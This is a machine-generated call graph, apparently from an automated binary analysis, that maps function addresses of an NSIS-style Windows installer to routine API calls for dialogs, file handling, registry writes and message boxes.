3323->3468 3324->3322 3327 4056f8 18 API calls 3328 4036aa 3327->3328 3329 403733 3328->3329 3331 405a61 3 API calls 3328->3331 3330 4056f8 18 API calls 3329->3330 3332 403739 3330->3332 3333 4036d6 3331->3333 3334 403749 LoadImageA 3332->3334 3335 405b9c 18 API calls 3332->3335 3333->3329 3338 4036f2 lstrlenA 3333->3338 3342 405635 CharNextA 3333->3342 3336 403770 RegisterClassA 3334->3336 3337 4037ef 3334->3337 3335->3334 3339 4037a6 SystemParametersInfoA CreateWindowExA 3336->3339 3340 4037f9 3336->3340 3341 40140b 2 API calls 3337->3341 3343 403700 lstrcmpiA 3338->3343 3344 403726 3338->3344 3339->3337 3340->3227 3345 4037f5 3341->3345 3347 4036f0 3342->3347 3343->3344 3348 403710 GetFileAttributesA 3343->3348 3346 40560a 3 API calls 3344->3346 3345->3340 3349 4038c8 19 API calls 3345->3349 3350 40372c 3346->3350 3347->3338 3351 40371c 3348->3351 3352 403806 3349->3352 3485 405b7a lstrcpynA 3350->3485 3351->3344 3354 405651 2 API calls 3351->3354 3355 403812 ShowWindow LoadLibraryA 3352->3355 3356 403895 3352->3356 3354->3344 3357 403831 LoadLibraryA 3355->3357 3358 403838 GetClassInfoA 3355->3358 3477 404f37 OleInitialize 3356->3477 3357->3358 3360 403862 DialogBoxParamA 3358->3360 3361 40384c GetClassInfoA RegisterClassA 3358->3361 3363 40140b 2 API calls 3360->3363 3361->3360 3362 40389b 3364 4038b7 3362->3364 3365 40389f 3362->3365 3363->3340 3366 40140b 2 API calls 3364->3366 3365->3340 3367 40140b 2 API calls 3365->3367 3366->3340 3367->3340 3368->3215 3494 405b7a lstrcpynA 3369->3494 3371 405709 3495 4056a3 CharNextA CharNextA 3371->3495 3374 403357 3374->3227 3383 405b7a lstrcpynA 3374->3383 3375 405de5 5 API calls 3380 40571f 3375->3380 3376 40574a lstrlenA 3377 405755 3376->3377 3376->3380 3379 40560a 3 API calls 3377->3379 3381 40575a GetFileAttributesA 3379->3381 3380->3374 3380->3376 3382 405651 2 API calls 3380->3382 3501 405e7e FindFirstFileA 3380->3501 3381->3374 3382->3376 3383->3259 3384->3230 3386 403541 3385->3386 3387 403533 CloseHandle 3385->3387 3504 40356e 3386->3504 3387->3386 3393 4053a3 3392->3393 3394 4033a8 ExitProcess 3393->3394 3395 4053b7 MessageBoxIndirectA 3393->3395 3395->3394 3396->3251 3397->3273 3399 405ea5 3 API calls 3398->3399 3400 405a35 3399->3400 3402 405a56 3400->3402 3561 4058b2 lstrcpyA 3400->3561 3402->3273 3404 405368 3403->3404 3405 40535c CloseHandle 3403->3405 3404->3273 3405->3404 3407 401389 2 API calls 3406->3407 3408 401420 3407->3408 3408->3240 3410 405624 lstrcatA 3409->3410 3411 4030b5 CreateDirectoryA 3409->3411 3410->3411 3412 40583a 3411->3412 3413 405845 GetTickCount GetTempFileNameA 3412->3413 3414 405872 3413->3414 3415 4030c9 3413->3415 3414->3413 3414->3415 3415->3217 3416->3288 3417->3290 3419 40565e 3418->3419 3420 405663 CharPrevA 3419->3420 3421 402c97 3419->3421 3420->3419 3420->3421 3422 405b7a lstrcpynA 3421->3422 3422->3294 3424 402bd0 3423->3424 3425 402be8 3423->3425 3426 402be0 3424->3426 3427 402bd9 DestroyWindow 3424->3427 3428 402bf0 3425->3428 3429 402bf8 GetTickCount 3425->3429 3426->3297 3427->3426 3461 405ede 3428->3461 3431 402c06 CreateDialogParamA ShowWindow 3429->3431 3432 402c29 3429->3432 3431->3432 3432->3297 3434->3303 3436 402e7c 3435->3436 3437 402ea9 3436->3437 3465 403080 SetFilePointer 3436->3465 3439 40306a ReadFile 3437->3439 3440 402eb4 3439->3440 3441 402ec6 GetTickCount 3440->3441 3442 402ff9 3440->3442 3444 402fe4 3440->3444 3441->3444 3454 402eef 3441->3454 3443 403045 3442->3443 3447 402ffd 3442->3447 3445 40306a ReadFile 3443->3445 3444->3312 3445->3444 3446 40306a ReadFile 3446->3454 3447->3444 3448 40306a ReadFile 3447->3448 3449 40301d WriteFile 3447->3449 3448->3447 3449->3444 3450 403032 3449->3450 3450->3444 3450->3447 3451 403043 3450->3451 3451->3444 3452 402f45 GetTickCount 3452->3454 3453 402f6e MulDiv wsprintfA 3456 404e65 25 API calls 3453->3456 3454->3444 3454->3446 3454->3452 3454->3453 3455 402fac WriteFile 3454->3455 3455->3444 3455->3454 3456->3454 3466 405883 ReadFile 3457->3466 3460->3305 3462 405efb PeekMessageA 3461->3462 3463 405ef1 DispatchMessageA 3462->3463 3464 402bf6 3462->3464 3463->3462 3464->3297 3465->3437 3467 40307d 3466->3467 3467->3306 3469 4038dc 3468->3469 3486 405ad8 wsprintfA 3469->3486 3471 40394d 3472 405b9c 18 API calls 3471->3472 3473 403959 SetWindowTextA 3472->3473 3474 403688 3473->3474 3475 403975 3473->3475 3474->3327 3475->3474 3476 405b9c 18 API calls 3475->3476 3476->3475 3487 403eb4 3477->3487 3479 404f5a 3483 404f81 3479->3483 3490 401389 3479->3490 3480 403eb4 SendMessageA 3481 404f93 OleUninitialize 3480->3481 3481->3362 3483->3480 3484->3323 3485->3329 3486->3471 3488 403ecc 3487->3488 3489 403ebd SendMessageA 3487->3489 3488->3479 3489->3488 3491 401390 3490->3491 3492 4013fe 3491->3492 3493 4013cb MulDiv SendMessageA 3491->3493 3492->3479 3493->3491 3494->3371 3496 4056be 3495->3496 3499 4056ce 3495->3499 3498 4056c9 CharNextA 3496->3498 3496->3499 3497 4056ee 3497->3374 3497->3375 3498->3497 3499->3497 3500 405635 CharNextA 3499->3500 3500->3499 3502 405e94 FindClose 3501->3502 3503 405e9f 3501->3503 3502->3503 3503->3380 3505 40357c 3504->3505 3506 403546 3505->3506 3507 403581 FreeLibrary GlobalFree 3505->3507 3508 40543a 3506->3508 3507->3506 3507->3507 3509 4056f8 18 API calls 3508->3509 3510 40545a 3509->3510 3511 405462 DeleteFileA 3510->3511 3512 405479 3510->3512 3513 40338a OleUninitialize 3511->3513 3514 4055a7 3512->3514 3548 405b7a lstrcpynA 3512->3548 3513->3237 3513->3238 3514->3513 3519 405e7e 2 API calls 3514->3519 3516 40549f 3517 4054b2 3516->3517 3518 4054a5 lstrcatA 3516->3518 3521 405651 2 API calls 3517->3521 3520 4054b8 3518->3520 3523 4055cb 3519->3523 3522 4054c6 lstrcatA 3520->3522 3524 4054d1 lstrlenA FindFirstFileA 3520->3524 3521->3520 3522->3524 3523->3513 3525 4055cf 3523->3525 3524->3514 3538 4054f5 3524->3538 3526 40560a 3 API calls 3525->3526 3528 4055d5 3526->3528 3527 405635 CharNextA 3527->3538 3529 4053f2 5 API calls 3528->3529 3530 4055e1 3529->3530 3531 4055e5 3530->3531 3532 4055fb 3530->3532 3531->3513 3537 404e65 25 API calls 3531->3537 3533 404e65 25 API calls 3532->3533 3533->3513 3534 405586 FindNextFileA 3536 40559e FindClose 3534->3536 3534->3538 3536->3514 3539 4055f2 3537->3539 3538->3527 3538->3534 3544 405547 3538->3544 3549 405b7a lstrcpynA 3538->3549 3540 405a2e 40 API calls 3539->3540 3543 4055f9 3540->3543 3542 40543a 64 API calls 3542->3544 3543->3513 3544->3534 3544->3542 3545 404e65 25 API calls 3544->3545 3546 404e65 25 API calls 3544->3546 3547 405a2e 40 API calls 3544->3547 3550 4053f2 3544->3550 3545->3534 3546->3544 3547->3544 3548->3516 3549->3538 3558 4057e6 GetFileAttributesA 3550->3558 3553 405415 DeleteFileA 3556 40541b 3553->3556 3554 40540d RemoveDirectoryA 3554->3556 3555 40541f 3555->3544 3556->3555 3557 40542b SetFileAttributesA 3556->3557 3557->3555 3559 4053fe 3558->3559 3560 4057f8 SetFileAttributesA 3558->3560 3559->3553 3559->3554 3559->3555 3560->3559 3562 405901 GetShortPathNameA 3561->3562 3563 4058db 3561->3563 3564 405916 3562->3564 3565 405a28 3562->3565 3586 40580b GetFileAttributesA CreateFileA 3563->3586 3564->3565 3567 40591e wsprintfA 3564->3567 3565->3402 3570 405b9c 18 API calls 3567->3570 3568 4058e5 CloseHandle GetShortPathNameA 3568->3565 3569 4058f9 3568->3569 3569->3562 3569->3565 3571 405946 3570->3571 3587 40580b GetFileAttributesA CreateFileA 3571->3587 3573 405953 3573->3565 3574 405962 GetFileSize GlobalAlloc 3573->3574 3575 405a21 CloseHandle 3574->3575 3576 405984 3574->3576 3575->3565 3577 405883 ReadFile 3576->3577 3578 40598c 3577->3578 3578->3575 3588 405770 lstrlenA 3578->3588 3581 4059a3 lstrcpyA 3584 4059c5 3581->3584 3582 4059b7 3583 405770 4 API calls 3582->3583 3583->3584 3585 4059fc SetFilePointer WriteFile GlobalFree 3584->3585 3585->3575 3586->3568 3587->3573 3589 4057b1 lstrlenA 3588->3589 3590 40578a lstrcmpiA 3589->3590 3592 4057b9 3589->3592 3591 4057a8 CharNextA 3590->3591 3590->3592 3591->3589 3592->3581 3592->3582 4013 401ccc GetDlgItem GetClientRect 4014 4029ff 18 API calls 4013->4014 4015 401cfc LoadImageA SendMessageA 4014->4015 4016 402894 4015->4016 4017 401d1a DeleteObject 4015->4017 4017->4016 3608 401650 3609 4029ff 18 API calls 3608->3609 3610 401657 3609->3610 3611 4029ff 18 API calls 3610->3611 3612 401660 3611->3612 3613 4029ff 18 API calls 3612->3613 3614 401669 MoveFileA 3613->3614 3615 40167c 3614->3615 3621 401675 3614->3621 3616 402183 3615->3616 3617 405e7e 2 API calls 3615->3617 3619 40168b 3617->3619 3619->3616 3620 405a2e 40 API calls 3619->3620 3620->3621 3622 401423 3621->3622 3623 404e65 25 API calls 3622->3623 3624 401431 3623->3624 3624->3616 4018 4024d3 4019 4024d8 4018->4019 4020 4024e9 4018->4020 4021 4029e2 18 API calls 4019->4021 4022 4029ff 18 API calls 4020->4022 4024 4024df 4021->4024 4023 4024f0 lstrlenA 4022->4023 4023->4024 4025 40250f WriteFile 4024->4025 4026 402665 4024->4026 4025->4026 4027 4025d5 4028 4025dc 4027->4028 4031 402841 4027->4031 4029 4029e2 18 API calls 4028->4029 4030 4025e7 4029->4030 4032 4025ee SetFilePointer 4030->4032 4032->4031 4033 4025fe 4032->4033 4035 405ad8 wsprintfA 4033->4035 4035->4031 3722 4014d6 3727 4029e2 3722->3727 3724 4014dc Sleep 3726 402894 3724->3726 3728 405b9c 18 API calls 3727->3728 3729 4029f6 3728->3729 3729->3724 3730 401dd8 3731 4029ff 18 API calls 3730->3731 3732 401dde 3731->3732 3733 4029ff 18 API calls 3732->3733 3734 401de7 3733->3734 3735 4029ff 18 API calls 3734->3735 3736 401df0 3735->3736 3737 4029ff 18 API calls 3736->3737 3738 401df9 3737->3738 3739 401423 25 API calls 3738->3739 3740 401e00 ShellExecuteA 3739->3740 3741 401e2d 3740->3741 4036 404dd9 4037 404de9 4036->4037 4038 404dfd 4036->4038 4039 404e46 4037->4039 4040 404def 4037->4040 4041 404e05 IsWindowVisible 4038->4041 4047 404e1c 4038->4047 4042 404e4b CallWindowProcA 4039->4042 4043 403eb4 SendMessageA 4040->4043 4041->4039 4044 404e12 4041->4044 4045 404df9 4042->4045 4043->4045 4049 404730 SendMessageA 4044->4049 4047->4042 4054 4047b0 4047->4054 4050 404753 GetMessagePos ScreenToClient SendMessageA 4049->4050 4051 40478f SendMessageA 4049->4051 4052 404787 4050->4052 4053 40478c 4050->4053 4051->4052 4052->4047 4053->4051 4063 405b7a lstrcpynA 4054->4063 4056 4047c3 4064 405ad8 wsprintfA 4056->4064 4058 4047cd 4059 40140b 2 API calls 4058->4059 4060 4047d6 4059->4060 4065 405b7a lstrcpynA 4060->4065 4062 4047dd 4062->4039 4063->4056 4064->4058 4065->4062 3748 40155b 3749 401577 ShowWindow 3748->3749 3750 40157e 3748->3750 3749->3750 3751 402894 3750->3751 3752 40158c ShowWindow 3750->3752 3752->3751 4066 401edc 4067 4029ff 18 API calls 4066->4067 4068 401ee3 GetFileVersionInfoSizeA 4067->4068 4069 401f5c 4068->4069 4070 401f06 GlobalAlloc 4068->4070 4070->4069 4071 401f1a GetFileVersionInfoA 4070->4071 4071->4069 4072 401f2b VerQueryValueA 4071->4072 4072->4069 4073 401f44 4072->4073 4077 405ad8 wsprintfA 4073->4077 4075 401f50 4078 405ad8 wsprintfA 4075->4078 4077->4075 4078->4069 4079 40425f 4080 404295 4079->4080 4081 40426f 4079->4081 4083 403ecf 8 API calls 4080->4083 4082 403e68 19 API calls 4081->4082 4084 40427c SetDlgItemTextA 4082->4084 4085 4042a1 4083->4085 4084->4080 4086 4047e2 GetDlgItem GetDlgItem 4087 404834 7 API calls 4086->4087 4100 404a4c 4086->4100 4088 4048d7 DeleteObject 4087->4088 4089 4048ca SendMessageA 4087->4089 4090 4048e0 4088->4090 4089->4088 4092 404917 4090->4092 4094 405b9c 18 API calls 4090->4094 4091 404b30 4093 404bdc 4091->4093 4096 404a3f 4091->4096 4102 404b89 SendMessageA 4091->4102 4095 403e68 19 API calls 4092->4095 4097 404be6 SendMessageA 4093->4097 4098 404bee 4093->4098 4099 4048f9 SendMessageA SendMessageA 4094->4099 4101 40492b 4095->4101 4103 403ecf 8 API calls 4096->4103 4097->4098 4110 404c00 ImageList_Destroy 4098->4110 4111 404c07 4098->4111 4115 404c17 4098->4115 4099->4090 4100->4091 4105 404730 5 API calls 4100->4105 4118 404abd 4100->4118 4106 403e68 19 API calls 4101->4106 4102->4096 4108 404b9e SendMessageA 4102->4108 4109 404dd2 4103->4109 4104 404b22 SendMessageA 4104->4091 4105->4118 4119 404939 4106->4119 4107 404d86 4107->4096 4116 404d98 ShowWindow GetDlgItem ShowWindow 4107->4116 4113 404bb1 4108->4113 4110->4111 4114 404c10 GlobalFree 4111->4114 4111->4115 4112 404a0d GetWindowLongA SetWindowLongA 4117 404a26 4112->4117 4124 404bc2 SendMessageA 4113->4124 4114->4115 4115->4107 4129 4047b0 4 API calls 4115->4129 4133 404c52 4115->4133 4116->4096 4120 404a44 4117->4120 4121 404a2c ShowWindow 4117->4121 4118->4091 4118->4104 4119->4112 4123 404988 SendMessageA 4119->4123 4125 404a07 4119->4125 4127 4049c4 SendMessageA 4119->4127 4128 4049d5 SendMessageA 4119->4128 4138 403e9d SendMessageA 4120->4138 4137 403e9d SendMessageA 4121->4137 4123->4119 4124->4093 4125->4112 4125->4117 4127->4119 4128->4119 4129->4133 4130 404d5c InvalidateRect 4130->4107 4131 404d72 4130->4131 4139 40464e 4131->4139 4132 404c80 SendMessageA 4136 404c96 4132->4136 4133->4132 4133->4136 4135 404d0a SendMessageA SendMessageA 4135->4136 4136->4130 4136->4135 4137->4096 4138->4100 4140 404668 4139->4140 4141 405b9c 18 API calls 4140->4141 4142 40469d 4141->4142 4143 405b9c 18 API calls 4142->4143 4144 4046a8 4143->4144 4145 405b9c 18 API calls 4144->4145 4146 4046d9 lstrlenA wsprintfA SetDlgItemTextA 4145->4146 4146->4107 4152 4018e3 4153 40191a 4152->4153 4154 4029ff 18 API calls 4153->4154 4155 40191f 4154->4155 4156 40543a 71 API calls 4155->4156 4157 401928 4156->4157 4158 4018e6 4159 4029ff 18 API calls 4158->4159 4160 4018ed 4159->4160 4161 40538e MessageBoxIndirectA 4160->4161 4162 4018f6 4161->4162 3820 401f68 3821 401f7a 3820->3821 3831 402028 3820->3831 3822 4029ff 18 API calls 3821->3822 3823 401f81 3822->3823 3825 4029ff 18 API calls 3823->3825 3824 401423 25 API calls 3826 402183 3824->3826 3827 401f8a 3825->3827 3828 401f92 GetModuleHandleA 3827->3828 3829 401f9f LoadLibraryExA 3827->3829 3828->3829 3830 401faf GetProcAddress 3828->3830 3829->3830 3829->3831 3832 401ffb 3830->3832 3833 401fbe 3830->3833 3831->3824 3834 404e65 25 API calls 3832->3834 3835 401423 25 API calls 3833->3835 3836 401fce 3833->3836 3834->3836 3835->3836 3836->3826 3837 40201c FreeLibrary 3836->3837 3837->3826 4163 4045e8 4164 404614 4163->4164 4165 4045f8 4163->4165 4167 404647 4164->4167 4168 40461a SHGetPathFromIDListA 4164->4168 4174 405372 GetDlgItemTextA 4165->4174 4170 404631 SendMessageA 4168->4170 4171 40462a 4168->4171 4169 404605 SendMessageA 4169->4164 4170->4167 4172 40140b 2 API calls 4171->4172 4172->4170 4174->4169 4175 1000102d 4176 100010d3 82 API calls 4175->4176 4177 10001058 4176->4177 4178 40286f SendMessageA 4179 402894 4178->4179 4180 402889 InvalidateRect 4178->4180 4180->4179 4181 4014f0 SetForegroundWindow 4182 402894 4181->4182 4183 401af0 4184 4029ff 18 API calls 4183->4184 4185 401af7 4184->4185 4186 4029e2 18 API calls 4185->4186 4187 401b00 wsprintfA 4186->4187 4188 402894 4187->4188 3852 4019f1 3853 4029ff 18 API calls 3852->3853 3854 4019fa ExpandEnvironmentStringsA 3853->3854 3855 401a0e 3854->3855 3857 401a21 3854->3857 3856 401a13 lstrcmpA 3855->3856 3855->3857 3856->3857 4189 401c78 4190 4029e2 18 API calls 4189->4190 4191 401c7e IsWindow 4190->4191 4192 4019e1 4191->4192 4193 403f7c lstrcpynA lstrlenA 4194 4014fe 4195 401506 4194->4195 4197 401519 4194->4197 4196 4029e2 18 API calls 4195->4196 4196->4197 4198 401000 4199 401037 BeginPaint GetClientRect 4198->4199 4200 40100c DefWindowProcA 4198->4200 4202 4010f3 4199->4202 4203 401179 4200->4203 4204 401073 CreateBrushIndirect FillRect DeleteObject 4202->4204 4205 4010fc 4202->4205 4204->4202 4206 401102 CreateFontIndirectA 4205->4206 4207 401167 EndPaint 4205->4207 4206->4207 4208 401112 6 API calls 4206->4208 4207->4203 4208->4207 3084 402281 3091 4029ff 3084->3091 3087 4029ff 18 API calls 3088 40229b 3087->3088 3089 4029ff 18 API calls 3088->3089 3090 4022a5 GetPrivateProfileStringA 3089->3090 3092 402a0b 3091->3092 3097 405b9c 3092->3097 3095 402292 3095->3087 3112 405ba9 3097->3112 3098 405dcc 3099 402a2c 3098->3099 3131 405b7a lstrcpynA 3098->3131 3099->3095 3115 405de5 3099->3115 3101 405c4a GetVersion 3101->3112 3102 405da3 lstrlenA 3102->3112 3103 405b9c 10 API calls 3103->3102 3106 405cc2 GetSystemDirectoryA 3106->3112 3108 405cd5 GetWindowsDirectoryA 3108->3112 3109 405de5 5 API calls 3109->3112 3110 405b9c 10 API calls 3110->3112 3111 405d4c lstrcatA 3111->3112 3112->3098 3112->3101 3112->3102 3112->3103 3112->3106 3112->3108 3112->3109 3112->3110 3112->3111 3113 405d09 SHGetSpecialFolderLocation 3112->3113 3124 405a61 RegOpenKeyExA 3112->3124 3129 405ad8 wsprintfA 3112->3129 3130 405b7a lstrcpynA 3112->3130 3113->3112 3114 405d21 SHGetPathFromIDListA CoTaskMemFree 3113->3114 3114->3112 3122 405df1 3115->3122 3116 405e59 3117 405e5d CharPrevA 3116->3117 3119 405e78 3116->3119 3117->3116 3118 405e4e CharNextA 3118->3116 3118->3122 3119->3095 3121 405e3c CharNextA 3121->3122 3122->3116 3122->3118 3122->3121 3123 405e49 CharNextA 3122->3123 3132 405635 3122->3132 3123->3118 3125 405ad2 3124->3125 3126 405a94 RegQueryValueExA 3124->3126 3125->3112 3127 405ab5 RegCloseKey 3126->3127 3127->3125 3129->3112 3130->3112 3131->3099 3133 40563b 3132->3133 3134 40564e 3133->3134 3135 405641 CharNextA 3133->3135 3134->3122 3135->3133 4209 402604 4210 402894 4209->4210 4211 40260b 4209->4211 4212 402611 FindClose 4211->4212 4212->4210 4213 401705 4214 4029ff 18 API calls 4213->4214 4215 40170c SearchPathA 4214->4215 4216 401727 4215->4216 4217 402685 4218 4029ff 18 API calls 4217->4218 4219 402693 4218->4219 4220 4026a9 4219->4220 4221 4029ff 18 API calls 4219->4221 4222 4057e6 2 API calls 4220->4222 4221->4220 4223 4026af 4222->4223 4243 40580b GetFileAttributesA CreateFileA 4223->4243 4225 4026bc 4226 402765 4225->4226 4227 4026c8 GlobalAlloc 4225->4227 4230 402780 4226->4230 4231 40276d DeleteFileA 4226->4231 4228 4026e1 4227->4228 4229 40275c CloseHandle 4227->4229 4244 403080 SetFilePointer 4228->4244 4229->4226 4231->4230 4233 4026e7 4234 40306a ReadFile 4233->4234 4235 4026f0 GlobalAlloc 4234->4235 4236 402700 4235->4236 4237 402734 WriteFile GlobalFree 4235->4237 4238 402e64 33 API calls 4236->4238 4239 402e64 33 API calls 4237->4239 4242 40270d 4238->4242 4240 402759 4239->4240 4240->4229 4241 40272b GlobalFree 4241->4237 4242->4241 4243->4225 4244->4233 4245 402786 4246 4029e2 18 API calls 4245->4246 4247 40278c 4246->4247 4248 4027b0 4247->4248 4249 4027c7 4247->4249 4254 402665 4247->4254 4250 4027b5 4248->4250 4258 4027c4 4248->4258 4251 4027d1 4249->4251 4252 4027dd 4249->4252 4259 405b7a lstrcpynA 4250->4259 4255 4029e2 18 API calls 4251->4255 4253 405b9c 18 API calls 4252->4253 4253->4258 4255->4258 4258->4254 4260 405ad8 wsprintfA 4258->4260 4259->4254 4260->4254 3593 40218c 3594 4029ff 18 API calls 3593->3594 3595 402192 3594->3595 3596 4029ff 18 API calls 3595->3596 3597 40219b 3596->3597 3598 4029ff 18 API calls 3597->3598 3599 4021a4 3598->3599 3600 405e7e 2 API calls 3599->3600 3601 4021ad 3600->3601 3602 4021b1 3601->3602 3603 4021be lstrlenA lstrlenA 3601->3603 3604 404e65 25 API calls 3602->3604 3607 4021b9 3602->3607 3605 404e65 25 API calls 3603->3605 3604->3607 3606 4021fa SHFileOperationA 3605->3606 3606->3602 3606->3607 4261 40280c 4262 4029e2 18 API calls 4261->4262 4263 402812 4262->4263 4264 402820 4263->4264 4265 402843 4263->4265 4267 402665 4263->4267 4264->4267 4269 405ad8 wsprintfA 4264->4269 4266 405b9c 18 API calls 4265->4266 4265->4267 4266->4267 4269->4267 4270 40220e 4271 402228 4270->4271 4272 402215 4270->4272 4273 405b9c 18 API calls 4272->4273 4274 402222 4273->4274 4275 40538e MessageBoxIndirectA 4274->4275 4275->4271 4276 401490 4277 404e65 25 API calls 4276->4277 4278 401497 4277->4278 4279 401b11 4280 401b62 4279->4280 4281 401b1e 4279->4281 4282 401b66 4280->4282 4283 401b8b GlobalAlloc 4280->4283 4284 401ba6 4281->4284 4287 401b35 4281->4287 4297 402228 4282->4297 4300 405b7a lstrcpynA 4282->4300 4285 405b9c 18 API calls 4283->4285 4286 405b9c 18 API calls 4284->4286 4284->4297 4285->4284 4289 402222 4286->4289 4298 405b7a lstrcpynA 4287->4298 4293 40538e MessageBoxIndirectA 4289->4293 4291 401b78 GlobalFree 4291->4297 4292 401b44 4299 405b7a lstrcpynA 4292->4299 4293->4297 4295 401b53 4301 405b7a lstrcpynA 4295->4301 4298->4292 4299->4295 4300->4291 4301->4297 3625 403995 3626 403ae8 3625->3626 3627 4039ad 3625->3627 3629 403b39 3626->3629 3630 403af9 GetDlgItem GetDlgItem 3626->3630 3627->3626 3628 4039b9 3627->3628 3631 4039c4 SetWindowPos 3628->3631 3632 4039d7 3628->3632 3634 403b93 3629->3634 3639 401389 2 API calls 3629->3639 3633 403e68 19 API calls 3630->3633 3631->3632 3636 4039f4 3632->3636 3637 4039dc ShowWindow 3632->3637 3638 403b23 SetClassLongA 3633->3638 3635 403eb4 SendMessageA 3634->3635 3655 403ae3 3634->3655 3662 403ba5 3635->3662 3640 403a16 3636->3640 3641 4039fc DestroyWindow 3636->3641 3637->3636 3642 40140b 2 API calls 3638->3642 3643 403b6b 3639->3643 3644 403a1b SetWindowLongA 3640->3644 3645 403a2c 3640->3645 3694 403df1 3641->3694 3642->3629 3643->3634 3648 403b6f SendMessageA 3643->3648 3644->3655 3646 403ad5 3645->3646 3647 403a38 GetDlgItem 3645->3647 3704 403ecf 3646->3704 3651 403a68 3647->3651 3652 403a4b SendMessageA IsWindowEnabled 3647->3652 3648->3655 3649 40140b 2 API calls 3649->3662 3650 403df3 DestroyWindow EndDialog 3650->3694 3657 403a75 3651->3657 3658 403abc SendMessageA 3651->3658 3659 403a88 3651->3659 3669 403a6d 3651->3669 3652->3651 3652->3655 3654 403e22 ShowWindow 3654->3655 3656 405b9c 18 API calls 3656->3662 3657->3658 3657->3669 3658->3646 3663 403a90 3659->3663 3664 403aa5 3659->3664 3661 403e68 19 API calls 3661->3662 3662->3649 3662->3650 3662->3655 3662->3656 3662->3661 3685 403d33 DestroyWindow 3662->3685 3695 403e68 3662->3695 3667 40140b 2 API calls 3663->3667 3666 40140b 2 API calls 3664->3666 3665 403aa3 3665->3646 3668 403aac 3666->3668 3667->3669 3668->3646 3668->3669 3701 403e41 3669->3701 3671 403c20 GetDlgItem 3672 403c35 3671->3672 3673 403c3d ShowWindow KiUserCallbackDispatcher 3671->3673 3672->3673 3698 403e8a KiUserCallbackDispatcher 3673->3698 3675 403c67 EnableWindow 3678 403c7b 3675->3678 3676 403c80 GetSystemMenu EnableMenuItem SendMessageA 3677 403cb0 SendMessageA 3676->3677 3676->3678 3677->3678 3678->3676 3699 403e9d SendMessageA 3678->3699 3700 405b7a lstrcpynA 3678->3700 3681 403cde lstrlenA 3682 405b9c 18 API calls 3681->3682 3683 403cef SetWindowTextA 3682->3683 3684 401389 2 API calls 3683->3684 3684->3662 3686 403d4d CreateDialogParamA 3685->3686 3685->3694 3687 403d80 3686->3687 3686->3694 3688 403e68 19 API calls 3687->3688 3689 403d8b GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3688->3689 3690 401389 2 API calls 3689->3690 3691 403dd1 3690->3691 3691->3655 3692 403dd9 ShowWindow 3691->3692 3693 403eb4 SendMessageA 3692->3693 3693->3694 3694->3654 3694->3655 3696 405b9c 18 API calls 3695->3696 3697 403e73 SetDlgItemTextA 3696->3697 3697->3671 3698->3675 3699->3678 3700->3681 3702 403e48 3701->3702 3703 403e4e SendMessageA 3701->3703 3702->3703 3703->3665 3705 403ee7 GetWindowLongA 3704->3705 3715 403f70 3704->3715 3706 403ef8 3705->3706 3705->3715 3707 403f07 GetSysColor 3706->3707 3708 403f0a 3706->3708 3707->3708 3709 403f10 SetTextColor 3708->3709 3710 403f1a SetBkMode 3708->3710 3709->3710 3711 403f32 GetSysColor 3710->3711 3712 403f38 3710->3712 3711->3712 3713 403f49 3712->3713 3714 403f3f SetBkColor 3712->3714 3713->3715 3716 403f63 CreateBrushIndirect 3713->3716 3717 403f5c DeleteObject 3713->3717 3714->3713 3715->3655 3716->3715 3717->3716 3718 401595 3719 4029ff 18 API calls 3718->3719 3720 40159c SetFileAttributesA 3719->3720 3721 4015ae 3720->3721 4302 401c95 4303 4029e2 18 API calls 4302->4303 4304 401c9c 4303->4304 4305 4029e2 18 API calls 4304->4305 4306 401ca4 GetDlgItem 4305->4306 4307 4024cd 4306->4307 4307->4307 4311 40251b 4312 4029e2 18 API calls 4311->4312 4313 402525 4312->4313 4314 405883 ReadFile 4313->4314 4315 402591 4313->4315 4318 4025a1 4313->4318 4319 40258f 4313->4319 4314->4313 4320 405ad8 wsprintfA 4315->4320 4317 4025b7 SetFilePointer 4317->4319 4318->4317 4318->4319 4320->4319 3753 40231e 3754 402324 3753->3754 3755 4029ff 18 API calls 3754->3755 3756 402336 3755->3756 3757 4029ff 18 API calls 3756->3757 3758 402340 RegCreateKeyExA 3757->3758 3759 402894 3758->3759 3760 40236a 3758->3760 3761 402382 3760->3761 3762 4029ff 18 API calls 3760->3762 3763 40238e 3761->3763 3765 4029e2 18 API calls 3761->3765 3764 40237b lstrlenA 3762->3764 3766 4023a9 RegSetValueExA 3763->3766 3767 402e64 33 API calls 3763->3767 3764->3761 3765->3763 3768 4023bf RegCloseKey 3766->3768 3767->3766 3768->3759 4321 40261e 4322 402621 4321->4322 4325 402639 4321->4325 4323 40262e FindNextFileA 4322->4323 4324 402678 4323->4324 4323->4325 4327 405b7a lstrcpynA 4324->4327 4327->4325 4328 4016a1 4329 4029ff 18 API calls 4328->4329 4330 4016a7 GetFullPathNameA 4329->4330 4331 4016df 4330->4331 4332 4016be 4330->4332 4333 4016f3 GetShortPathNameA 4331->4333 4334 402894 4331->4334 4332->4331 4335 405e7e 2 API calls 4332->4335 4333->4334 4336 4016cf 4335->4336 4336->4331 4338 405b7a lstrcpynA 4336->4338 4338->4331 3770 404fa3 3771 405150 3770->3771 3772 404fc5 GetDlgItem GetDlgItem GetDlgItem 3770->3772 3774 405180 3771->3774 3775 405158 GetDlgItem CreateThread FindCloseChangeNotification 3771->3775 3816 403e9d SendMessageA 3772->3816 3777 4051ae 3774->3777 3778 405196 ShowWindow ShowWindow 3774->3778 3779 4051cf 3774->3779 3775->3774 3819 404f37 5 API calls 3775->3819 3776 405036 3782 40503d GetClientRect GetSystemMetrics SendMessageA SendMessageA 3776->3782 3780 4051b6 3777->3780 3781 405209 3777->3781 3818 403e9d SendMessageA 3778->3818 3786 403ecf 8 API calls 3779->3786 3784 4051e2 ShowWindow 3780->3784 3785 4051be 3780->3785 3781->3779 3789 405216 SendMessageA 3781->3789 3787 405090 SendMessageA SendMessageA 3782->3787 3788 4050ac 3782->3788 3792 405202 3784->3792 3793 4051f4 3784->3793 3790 403e41 SendMessageA 3785->3790 3791 4051db 3786->3791 3787->3788 3796 4050b1 SendMessageA 3788->3796 3797 4050bf 3788->3797 3789->3791 3798 40522f CreatePopupMenu 3789->3798 3790->3779 3795 403e41 SendMessageA 3792->3795 3794 404e65 25 API calls 3793->3794 3794->3792 3795->3781 3796->3797 3800 403e68 19 API calls 3797->3800 3799 405b9c 18 API calls 3798->3799 3801 40523f AppendMenuA 3799->3801 3802 4050cf 3800->3802 3803 405270 TrackPopupMenu 3801->3803 3804 40525d GetWindowRect 3801->3804 3805 4050d8 ShowWindow 3802->3805 3806 40510c GetDlgItem SendMessageA 3802->3806 3803->3791 3808 40528c 3803->3808 